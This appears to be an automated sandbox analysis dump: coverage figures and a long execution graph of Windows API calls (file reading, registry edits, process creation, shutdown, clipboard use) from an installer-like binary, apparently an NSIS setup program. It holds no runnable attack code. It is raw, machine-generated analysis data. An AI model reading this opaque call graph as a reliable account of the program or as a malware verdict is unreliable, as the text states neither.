                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:20.6%
                                                                          Total number of Nodes:1523
                                                                          Total number of Limit Nodes:39
                                                                          execution_graph 4182 402fc0 4183 401446 18 API calls 4182->4183 4184 402fc7 4183->4184 4185 403017 4184->4185 4186 40300a 4184->4186 4189 401a13 4184->4189 4187 406805 18 API calls 4185->4187 4188 401446 18 API calls 4186->4188 4187->4189 4188->4189 4190 4023c1 4191 40145c 18 API calls 4190->4191 4192 4023c8 4191->4192 4195 40726a 4192->4195 4198 406ed2 CreateFileW 4195->4198 4199 406f04 4198->4199 4200 406f1e ReadFile 4198->4200 4201 4062a3 11 API calls 4199->4201 4202 4023d6 4200->4202 4205 406f84 4200->4205 4201->4202 4203 4071e3 CloseHandle 4203->4202 4204 406f9b ReadFile lstrcpynA lstrcmpA 4204->4205 4206 406fe2 SetFilePointer ReadFile 4204->4206 4205->4202 4205->4203 4205->4204 4209 406fdd 4205->4209 4206->4203 4207 4070a8 ReadFile 4206->4207 4208 407138 4207->4208 4208->4207 4208->4209 4210 40715f SetFilePointer GlobalAlloc ReadFile 4208->4210 4209->4203 4211 4071a3 4210->4211 4212 4071bf lstrcpynW GlobalFree 4210->4212 4211->4211 4211->4212 4212->4203 4213 401cc3 4214 40145c 18 API calls 4213->4214 4215 401cca lstrlenW 4214->4215 4216 4030dc 4215->4216 4217 4030e3 4216->4217 4219 405f51 wsprintfW 4216->4219 4219->4217 4234 401c46 4235 40145c 18 API calls 4234->4235 4236 401c4c 4235->4236 4237 4062a3 11 API calls 4236->4237 4238 401c59 4237->4238 4239 406c9b 81 API calls 4238->4239 4240 401c64 4239->4240 4241 403049 4242 401446 18 API calls 4241->4242 4245 403050 4242->4245 4243 406805 18 API calls 4244 401a13 4243->4244 4245->4243 4245->4244 4246 40204a 4247 401446 18 API calls 4246->4247 4248 402051 IsWindow 4247->4248 4249 4018d3 4248->4249 4250 40324c 4251 403277 4250->4251 4252 40325e SetTimer 4250->4252 4253 4032cc 4251->4253 4254 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4251->4254 4252->4251 4254->4253 4255 4048cc 4256 4048f1 4255->4256 4257 4048da 4255->4257 4259 4048ff IsWindowVisible 4256->4259 4263 404916 4256->4263 4258 4048e0 4257->4258 4273 40495a 4257->4273 4260 403daf SendMessageW 4258->4260 4262 40490c 4259->4262 4259->4273 4264 4048ea 4260->4264 4261 404960 CallWindowProcW 4261->4264 4274 40484e SendMessageW 4262->4274 4263->4261 4279 406009 lstrcpynW 4263->4279 4267 404945 4280 405f51 wsprintfW 4267->4280 4269 40494c 4270 40141d 80 API calls 4269->4270 4271 404953 4270->4271 4281 406009 lstrcpynW 4271->4281 4273->4261 4275 404871 GetMessagePos ScreenToClient SendMessageW 4274->4275 4276 4048ab SendMessageW 4274->4276 4277 4048a3 4275->4277 4278 4048a8 4275->4278 4276->4277 4277->4263 4278->4276 4279->4267 4280->4269 4281->4273 4282 4022cc 4283 40145c 18 API calls 4282->4283 4284 4022d3 4283->4284 4285 4062d5 2 API calls 4284->4285 4286 4022d9 4285->4286 4287 4022e8 4286->4287 4291 405f51 wsprintfW 4286->4291 4290 4030e3 4287->4290 4292 405f51 wsprintfW 4287->4292 4291->4287 4292->4290 4293 4050cd 4294 405295 4293->4294 4295 4050ee GetDlgItem GetDlgItem GetDlgItem 4293->4295 4296 4052c6 4294->4296 4297 40529e GetDlgItem CreateThread CloseHandle 4294->4297 4342 403d98 SendMessageW 4295->4342 4299 4052f4 4296->4299 4301 4052e0 ShowWindow ShowWindow 4296->4301 4302 405316 4296->4302 4297->4296 4303 405352 4299->4303 4305 405305 4299->4305 4306 40532b ShowWindow 4299->4306 4300 405162 4313 406805 18 API calls 4300->4313 4347 403d98 SendMessageW 4301->4347 4351 403dca 4302->4351 4303->4302 4308 40535d SendMessageW 4303->4308 4348 403d18 4305->4348 4311 40534b 4306->4311 4312 40533d 4306->4312 4310 40528e 4308->4310 4315 405376 CreatePopupMenu 4308->4315 4314 403d18 SendMessageW 4311->4314 4316 404f72 25 API calls 4312->4316 4317 405181 4313->4317 4314->4303 4318 406805 18 API calls 4315->4318 4316->4311 4319 4062a3 11 API calls 4317->4319 4321 405386 AppendMenuW 4318->4321 4320 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4319->4320 4322 4051f3 4320->4322 4323 4051d7 SendMessageW SendMessageW 4320->4323 4324 405399 GetWindowRect 4321->4324 4325 4053ac 4321->4325 4326 405206 4322->4326 4327 4051f8 SendMessageW 4322->4327 4323->4322 4328 4053b3 TrackPopupMenu 4324->4328 4325->4328 4343 403d3f 4326->4343 4327->4326 4328->4310 4330 4053d1 4328->4330 4332 4053ed SendMessageW 4330->4332 4331 405216 4333 405253 GetDlgItem SendMessageW 4331->4333 4334 40521f ShowWindow 4331->4334 4332->4332 4335 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4332->4335 4333->4310 4338 405276 SendMessageW SendMessageW 4333->4338 4336 405242 4334->4336 4337 405235 ShowWindow 4334->4337 4339 40542f SendMessageW 4335->4339 4346 403d98 SendMessageW 4336->4346 4337->4336 4338->4310 4339->4339 4340 40545a GlobalUnlock SetClipboardData CloseClipboard 4339->4340 4340->4310 4342->4300 4344 406805 18 API calls 4343->4344 4345 403d4a SetDlgItemTextW 4344->4345 4345->4331 4346->4333 4347->4299 4349 403d25 SendMessageW 4348->4349 4350 403d1f 4348->4350 4349->4302 4350->4349 4352 403ddf GetWindowLongW 4351->4352 4362 403e68 4351->4362 4353 403df0 4352->4353 4352->4362 4354 403e02 4353->4354 4355 403dff GetSysColor 4353->4355 4356 403e12 SetBkMode 4354->4356 4357 403e08 SetTextColor 4354->4357 4355->4354 4358 403e30 4356->4358 4359 403e2a GetSysColor 4356->4359 4357->4356 4360 403e41 4358->4360 4361 403e37 SetBkColor 4358->4361 4359->4358 4360->4362 4363 403e54 DeleteObject 4360->4363 4364 403e5b CreateBrushIndirect 4360->4364 4361->4360 4362->4310 4363->4364 4364->4362 4365 4030cf 4366 40145c 18 API calls 4365->4366 4367 4030d6 4366->4367 4369 4030dc 4367->4369 4372 4063ac GlobalAlloc lstrlenW 4367->4372 4370 4030e3 4369->4370 4399 405f51 wsprintfW 4369->4399 4373 4063e2 4372->4373 4374 406434 4372->4374 4375 40640f GetVersionExW 4373->4375 4400 40602b CharUpperW 4373->4400 4374->4369 4375->4374 4376 40643e 4375->4376 4377 406464 LoadLibraryA 4376->4377 4378 40644d 4376->4378 4377->4374 4381 406482 GetProcAddress GetProcAddress GetProcAddress 4377->4381 4378->4374 4380 406585 GlobalFree 4378->4380 4382 40659b LoadLibraryA 4380->4382 4383 4066dd FreeLibrary 4380->4383 4386 4064aa 4381->4386 4389 4065f5 4381->4389 4382->4374 4385 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4382->4385 4383->4374 4384 406651 FreeLibrary 4393 40662a 4384->4393 4385->4389 4387 4064ce FreeLibrary GlobalFree 4386->4387 4386->4389 4395 4064ea 4386->4395 4387->4374 4388 4066ea 4391 4066ef CloseHandle FreeLibrary 4388->4391 4389->4384 4389->4393 4390 4064fc lstrcpyW OpenProcess 4392 40654f CloseHandle CharUpperW lstrcmpW 4390->4392 4390->4395 4394 406704 CloseHandle 4391->4394 4392->4389 4392->4395 4393->4388 4396 406685 lstrcmpW 4393->4396 4397 4066b6 CloseHandle 4393->4397 4398 4066d4 CloseHandle 4393->4398 4394->4391 4395->4380 4395->4390 4395->4392 4396->4393 4396->4394 4397->4393 4398->4383 4399->4370 4400->4373 4401 407752 4405 407344 4401->4405 4402 407c6d 4403 4073c2 GlobalFree 4404 4073cb GlobalAlloc 4403->4404 4404->4402 4404->4405 4405->4402 4405->4403 4405->4404 4405->4405 4406 407443 GlobalAlloc 4405->4406 4407 40743a GlobalFree 4405->4407 4406->4402 4406->4405 4407->4406 4408 401dd3 4409 401446 18 API calls 4408->4409 4410 401dda 4409->4410 4411 401446 18 API calls 4410->4411 4412 4018d3 4411->4412 4420 402e55 4421 40145c 18 API calls 4420->4421 4422 402e63 4421->4422 4423 402e79 4422->4423 4424 40145c 18 API calls 4422->4424 4425 405e30 2 API calls 4423->4425 4424->4423 4426 402e7f 4425->4426 4450 405e50 GetFileAttributesW CreateFileW 4426->4450 4428 402e8c 4429 402f35 4428->4429 4430 402e98 GlobalAlloc 4428->4430 4433 4062a3 11 API calls 4429->4433 4431 402eb1 4430->4431 4432 402f2c CloseHandle 4430->4432 4451 403368 SetFilePointer 4431->4451 4432->4429 4435 402f45 4433->4435 4437 402f50 DeleteFileW 4435->4437 4438 402f63 4435->4438 4436 402eb7 4440 403336 ReadFile 4436->4440 4437->4438 4452 401435 4438->4452 4441 402ec0 GlobalAlloc 4440->4441 4442 402ed0 4441->4442 4443 402f04 WriteFile GlobalFree 4441->4443 4444 40337f 37 API calls 4442->4444 4445 40337f 37 API calls 4443->4445 4449 402edd 4444->4449 4446 402f29 4445->4446 4446->4432 4448 402efb GlobalFree 4448->4443 4449->4448 4450->4428 4451->4436 4453 404f72 25 API calls 4452->4453 4454 401443 4453->4454 4455 401cd5 4456 401446 18 API calls 4455->4456 4457 401cdd 4456->4457 4458 401446 18 API calls 4457->4458 4459 401ce8 4458->4459 4460 40145c 18 API calls 4459->4460 4461 401cf1 4460->4461 4462 401d07 lstrlenW 4461->4462 4463 401d43 4461->4463 4464 401d11 4462->4464 4464->4463 4468 406009 lstrcpynW 4464->4468 4466 401d2c 4466->4463 4467 401d39 lstrlenW 4466->4467 4467->4463 4468->4466 4469 403cd6 4470 403ce1 4469->4470 4471 403ce5 4470->4471 4472 403ce8 GlobalAlloc 4470->4472 4472->4471 4473 402cd7 4474 401446 18 API calls 4473->4474 4477 402c64 4474->4477 4475 402d99 4476 402d17 ReadFile 4476->4477 4477->4473 4477->4475 4477->4476 4478 402dd8 4479 402ddf 4478->4479 4480 4030e3 4478->4480 4481 402de5 FindClose 4479->4481 4481->4480 4482 401d5c 4483 40145c 18 API calls 4482->4483 4484 401d63 4483->4484 4485 40145c 18 API calls 4484->4485 4486 401d6c 4485->4486 4487 401d73 lstrcmpiW 4486->4487 4488 401d86 lstrcmpW 4486->4488 4489 401d79 4487->4489 4488->4489 4490 401c99 4488->4490 4489->4488 4489->4490 4120 407c5f 4121 407344 4120->4121 4122 4073c2 GlobalFree 4121->4122 4123 4073cb GlobalAlloc 4121->4123 4124 407c6d 4121->4124 4125 407443 GlobalAlloc 4121->4125 4126 40743a GlobalFree 4121->4126 4122->4123 4123->4121 4123->4124 4125->4121 4125->4124 4126->4125 4491 404363 4492 404373 4491->4492 4493 40439c 4491->4493 4495 403d3f 19 API calls 4492->4495 4494 403dca 8 API calls 4493->4494 4496 4043a8 4494->4496 4497 404380 SetDlgItemTextW 4495->4497 4497->4493 4498 4027e3 4499 4027e9 4498->4499 4500 4027f2 4499->4500 4501 402836 4499->4501 4514 401553 4500->4514 4502 40145c 18 API calls 4501->4502 4504 40283d 4502->4504 4506 4062a3 11 API calls 4504->4506 4505 4027f9 4507 40145c 18 API calls 4505->4507 4512 401a13 4505->4512 4508 40284d 4506->4508 4509 40280a RegDeleteValueW 4507->4509 4518 40149d RegOpenKeyExW 4508->4518 4510 4062a3 11 API calls 4509->4510 4513 40282a RegCloseKey 4510->4513 4513->4512 4515 401563 4514->4515 4516 40145c 18 API calls 4515->4516 4517 401589 RegOpenKeyExW 4516->4517 4517->4505 4524 401515 4518->4524 4526 4014c9 4518->4526 4519 4014ef RegEnumKeyW 4520 401501 RegCloseKey 4519->4520 4519->4526 4521 4062fc 3 API calls 4520->4521 4523 401511 4521->4523 4522 401526 RegCloseKey 4522->4524 4523->4524 4527 401541 RegDeleteKeyW 4523->4527 4524->4512 4525 40149d 3 API calls 4525->4526 4526->4519 4526->4520 4526->4522 4526->4525 4527->4524 4528 403f64 4529 403f90 4528->4529 4530 403f74 4528->4530 4532 403fc3 4529->4532 4533 403f96 SHGetPathFromIDListW 4529->4533 4539 405c84 GetDlgItemTextW 4530->4539 4535 403fad SendMessageW 4533->4535 4536 403fa6 4533->4536 4534 403f81 SendMessageW 4534->4529 4535->4532 4537 40141d 80 API calls 4536->4537 4537->4535 4539->4534 4540 402ae4 4541 402aeb 4540->4541 4542 4030e3 4540->4542 4543 402af2 CloseHandle 4541->4543 4543->4542 4544 402065 4545 401446 18 API calls 4544->4545 4546 40206d 4545->4546 4547 401446 18 API calls 4546->4547 4548 402076 GetDlgItem 4547->4548 4549 4030dc 4548->4549 4550 4030e3 4549->4550 4552 405f51 wsprintfW 4549->4552 4552->4550 4553 402665 4554 40145c 18 API calls 4553->4554 4555 40266b 4554->4555 4556 40145c 18 API calls 4555->4556 4557 402674 4556->4557 4558 40145c 18 API calls 4557->4558 4559 40267d 4558->4559 4560 4062a3 11 API calls 4559->4560 4561 40268c 4560->4561 4562 4062d5 2 API calls 4561->4562 4563 402695 4562->4563 4564 4026a6 lstrlenW lstrlenW 4563->4564 4565 404f72 25 API calls 4563->4565 4568 4030e3 4563->4568 4566 404f72 25 API calls 4564->4566 4565->4563 4567 4026e8 SHFileOperationW 4566->4567 4567->4563 4567->4568 4576 401c69 4577 40145c 18 API calls 4576->4577 4578 401c70 4577->4578 4579 4062a3 11 API calls 4578->4579 4580 401c80 4579->4580 4581 405ca0 MessageBoxIndirectW 4580->4581 4582 401a13 4581->4582 4590 402f6e 4591 402f72 4590->4591 4592 402fae 4590->4592 4593 4062a3 11 API calls 4591->4593 4594 40145c 18 API calls 4592->4594 4595 402f7d 4593->4595 4600 402f9d 4594->4600 4596 4062a3 11 API calls 4595->4596 4597 402f90 4596->4597 4598 402fa2 4597->4598 4599 402f98 4597->4599 4602 4060e7 9 API calls 4598->4602 4601 403e74 5 API calls 4599->4601 4601->4600 4602->4600 4603 4023f0 4604 402403 4603->4604 4605 4024da 4603->4605 4606 40145c 18 API calls 4604->4606 4607 404f72 25 API calls 4605->4607 4608 40240a 4606->4608 4613 4024f1 4607->4613 4609 40145c 18 API calls 4608->4609 4610 402413 4609->4610 4611 402429 LoadLibraryExW 4610->4611 4612 40241b GetModuleHandleW 4610->4612 4614 40243e 4611->4614 4615 4024ce 4611->4615 4612->4611 4612->4614 4627 406365 GlobalAlloc WideCharToMultiByte 4614->4627 4616 404f72 25 API calls 4615->4616 4616->4605 4618 402449 4619 40248c 4618->4619 4620 40244f 4618->4620 4621 404f72 25 API calls 4619->4621 4623 401435 25 API calls 4620->4623 4625 40245f 4620->4625 4622 402496 4621->4622 4624 4062a3 11 API calls 4622->4624 4623->4625 4624->4625 4625->4613 4626 4024c0 FreeLibrary 4625->4626 4626->4613 4628 406390 GetProcAddress 4627->4628 4629 40639d GlobalFree 4627->4629 4628->4629 4629->4618 4630 402df3 4631 402dfa 4630->4631 4633 4019ec 4630->4633 4632 402e07 FindNextFileW 4631->4632 4632->4633 4634 402e16 4632->4634 4636 406009 lstrcpynW 4634->4636 4636->4633 4637 402175 4638 401446 18 API calls 4637->4638 4639 40217c 4638->4639 4640 401446 18 API calls 4639->4640 4641 402186 4640->4641 4642 4062a3 11 API calls 4641->4642 4646 402197 4641->4646 4642->4646 4643 4021aa EnableWindow 4645 4030e3 4643->4645 4644 40219f ShowWindow 4644->4645 4646->4643 4646->4644 4654 404077 4655 404081 4654->4655 4656 404084 lstrcpynW lstrlenW 4654->4656 4655->4656 4657 405479 4658 405491 4657->4658 4659 4055cd 4657->4659 4658->4659 4660 40549d 4658->4660 4661 40561e 4659->4661 4662 4055de GetDlgItem GetDlgItem 4659->4662 4663 4054a8 SetWindowPos 4660->4663 4664 4054bb 4660->4664 4666 405678 4661->4666 4674 40139d 80 API calls 4661->4674 4665 403d3f 19 API calls 4662->4665 4663->4664 4668 4054c0 ShowWindow 4664->4668 4669 4054d8 4664->4669 4670 405608 SetClassLongW 4665->4670 4667 403daf SendMessageW 4666->4667 4687 4055c8 4666->4687 4696 40568a 4667->4696 4668->4669 4671 4054e0 DestroyWindow 4669->4671 4672 4054fa 4669->4672 4673 40141d 80 API calls 4670->4673 4724 4058dc 4671->4724 4675 405510 4672->4675 4676 4054ff SetWindowLongW 4672->4676 4673->4661 4677 405650 4674->4677 4680 405587 4675->4680 4681 40551c GetDlgItem 4675->4681 4676->4687 4677->4666 4682 405654 SendMessageW 4677->4682 4678 40141d 80 API calls 4678->4696 4679 4058de DestroyWindow EndDialog 4679->4724 4683 403dca 8 API calls 4680->4683 4685 40554c 4681->4685 4686 40552f SendMessageW IsWindowEnabled 4681->4686 4682->4687 4683->4687 4684 40590d ShowWindow 4684->4687 4689 405559 4685->4689 4690 4055a0 SendMessageW 4685->4690 4691 40556c 4685->4691 4699 405551 4685->4699 4686->4685 4686->4687 4688 406805 18 API calls 4688->4696 4689->4690 4689->4699 4690->4680 4694 405574 4691->4694 4695 405589 4691->4695 4692 403d18 SendMessageW 4692->4680 4693 403d3f 19 API calls 4693->4696 4697 40141d 80 API calls 4694->4697 4698 40141d 80 API calls 4695->4698 4696->4678 4696->4679 4696->4687 4696->4688 4696->4693 4700 403d3f 19 API calls 4696->4700 4715 40581e DestroyWindow 4696->4715 4697->4699 4698->4699 4699->4680 4699->4692 4701 405705 GetDlgItem 4700->4701 4702 405723 ShowWindow EnableWindow 4701->4702 4703 40571a 4701->4703 4725 403d85 EnableWindow 4702->4725 4703->4702 4705 40574d EnableWindow 4708 405761 4705->4708 4706 405766 GetSystemMenu EnableMenuItem SendMessageW 4707 405796 SendMessageW 4706->4707 4706->4708 4707->4708 4708->4706 4726 403d98 SendMessageW 4708->4726 4727 406009 lstrcpynW 4708->4727 4711 4057c4 lstrlenW 4712 406805 18 API calls 4711->4712 4713 4057da SetWindowTextW 4712->4713 4714 40139d 80 API calls 4713->4714 4714->4696 4716 405838 CreateDialogParamW 4715->4716 4715->4724 4717 40586b 4716->4717 4716->4724 4718 403d3f 19 API calls 4717->4718 4719 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4718->4719 4720 40139d 80 API calls 4719->4720 4721 4058bc 4720->4721 4721->4687 4722 4058c4 ShowWindow 4721->4722 4723 403daf SendMessageW 4722->4723 4723->4724 4724->4684 4724->4687 4725->4705 4726->4708 4727->4711 4728 4020f9 GetDC GetDeviceCaps 4729 401446 18 API calls 4728->4729 4730 402116 MulDiv 4729->4730 4731 401446 18 API calls 4730->4731 4732 40212c 4731->4732 4733 406805 18 API calls 4732->4733 4734 402165 CreateFontIndirectW 4733->4734 4735 4030dc 4734->4735 4736 4030e3 4735->4736 4738 405f51 wsprintfW 4735->4738 4738->4736 4739 4024fb 4740 40145c 18 API calls 4739->4740 4741 402502 4740->4741 4742 40145c 18 API calls 4741->4742 4743 40250c 4742->4743 4744 40145c 18 API calls 4743->4744 4745 402515 4744->4745 4746 40145c 18 API calls 4745->4746 4747 40251f 4746->4747 4748 40145c 18 API calls 4747->4748 4749 402529 4748->4749 4750 40253d 4749->4750 4751 40145c 18 API calls 4749->4751 4752 4062a3 11 API calls 4750->4752 4751->4750 4753 40256a CoCreateInstance 4752->4753 4754 40258c 4753->4754 4755 40497c GetDlgItem GetDlgItem 4756 4049d2 7 API calls 4755->4756 4761 404bea 4755->4761 4757 404a76 DeleteObject 4756->4757 4758 404a6a SendMessageW 4756->4758 4759 404a81 4757->4759 4758->4757 4762 404ab8 4759->4762 4764 406805 18 API calls 4759->4764 4760 404ccf 4763 404d74 4760->4763 4768 404bdd 4760->4768 4773 404d1e SendMessageW 4760->4773 4761->4760 4771 40484e 5 API calls 4761->4771 4784 404c5a 4761->4784 4767 403d3f 19 API calls 4762->4767 4765 404d89 4763->4765 4766 404d7d SendMessageW 4763->4766 4770 404a9a SendMessageW SendMessageW 4764->4770 4775 404da2 4765->4775 4776 404d9b ImageList_Destroy 4765->4776 4786 404db2 4765->4786 4766->4765 4772 404acc 4767->4772 4774 403dca 8 API calls 4768->4774 4769 404cc1 SendMessageW 4769->4760 4770->4759 4771->4784 4777 403d3f 19 API calls 4772->4777 4773->4768 4779 404d33 SendMessageW 4773->4779 4780 404f6b 4774->4780 4781 404dab GlobalFree 4775->4781 4775->4786 4776->4775 4782 404add 4777->4782 4778 404f1c 4778->4768 4787 404f31 ShowWindow GetDlgItem ShowWindow 4778->4787 4783 404d46 4779->4783 4781->4786 4785 404baa GetWindowLongW SetWindowLongW 4782->4785 4794 404ba4 4782->4794 4797 404b39 SendMessageW 4782->4797 4798 404b67 SendMessageW 4782->4798 4799 404b7b SendMessageW 4782->4799 4793 404d57 SendMessageW 4783->4793 4784->4760 4784->4769 4788 404bc4 4785->4788 4786->4778 4789 404de4 4786->4789 4792 40141d 80 API calls 4786->4792 4787->4768 4790 404be2 4788->4790 4791 404bca ShowWindow 4788->4791 4802 404e12 SendMessageW 4789->4802 4805 404e28 4789->4805 4807 403d98 SendMessageW 4790->4807 4806 403d98 SendMessageW 4791->4806 4792->4789 4793->4763 4794->4785 4794->4788 4797->4782 4798->4782 4799->4782 4800 404ef3 InvalidateRect 4800->4778 4801 404f09 4800->4801 4808 4043ad 4801->4808 4802->4805 4804 404ea1 SendMessageW SendMessageW 4804->4805 4805->4800 4805->4804 4806->4768 4807->4761 4809 4043cd 4808->4809 4810 406805 18 API calls 4809->4810 4811 40440d 4810->4811 4812 406805 18 API calls 4811->4812 4813 404418 4812->4813 4814 406805 18 API calls 4813->4814 4815 404428 lstrlenW wsprintfW SetDlgItemTextW 4814->4815 4815->4778 4816 4026fc 4817 401ee4 4816->4817 4819 402708 4816->4819 4817->4816 4818 406805 18 API calls 4817->4818 4818->4817 4820 4019fd 4821 40145c 18 API calls 4820->4821 4822 401a04 4821->4822 4823 405e7f 2 API calls 4822->4823 4824 401a0b 4823->4824 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 